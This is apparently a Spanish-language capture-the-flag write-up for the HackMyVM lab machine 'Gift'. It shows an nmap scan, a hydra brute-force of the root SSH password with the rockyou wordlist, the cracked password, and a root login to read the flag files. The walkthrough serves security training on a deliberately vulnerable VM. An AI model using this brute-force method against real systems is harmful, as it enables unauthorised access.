[HackMyVM] Gift

Hoy vamos a hackear la maquina de HackMyVM llamada Gift. Podeis registraros y descargarla desde el siguiente enlace: HackMyVM

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

> nmap -A -p- 192.168.1.54                                                  
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-23 10:30 CET
Nmap scan report for gift.home (192.168.1.54)
Host is up (0.00047s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.3 (protocol 2.0)
80/tcp open  http    nginx
|_http-server-header: nginx
|_http-title: Site doesn't have a title (text/html).

Service detection performe> Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.81 seconds
Vemos que tiene SSH y HTTP. Si vemos la el contenido de la web tanto su codigo vemos lo siguiente.

Dont Overthink. Really, Its simple.
	<-- Trust me -->
Nos dice que no pensemos demasiado, y que es simple :) Asi que vamos a lo mas sencillo que es hacer bruteforce a la password de root.

> hydra -l root 192.168.1.54 -P /usr/share/wordlists/rockyou.txt ssh        
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret 
service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-17 
12:32:45
[WARNING] Many SSH configurations limit the number of parallel tasks, it is 
recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries 
(l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://192.168.1.54:22/
[STATUS] 181.00 tries/min, 181 tries in 00:01h, 14344222 to do in 1320:50h, 16 
active
[22][ssh] host: 192.168.1.54   login: root   password: simple
Al poco rato, ya tenemos la password de root.

Root Shell


Teniendo la password de root, nos logueamos!

> ssh root@192.168.1.54                                                                                                                       
root@192.168.1.54's password: 
IM AN SSH SERVER
gift:~# id
uid=0(root) gid=0(root) 
groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(flopp
y),20(dialout),26(tape),27(video)

user.txt



gift:~# ls
root.txt  user.txt
gift:~# head -c 4 user.txt
HMV6gift:~#

root.txt



gift:~# head -c 4 root.txt 
HMV6gift:~#

End


Y con esto ya seriamos root de la maquina!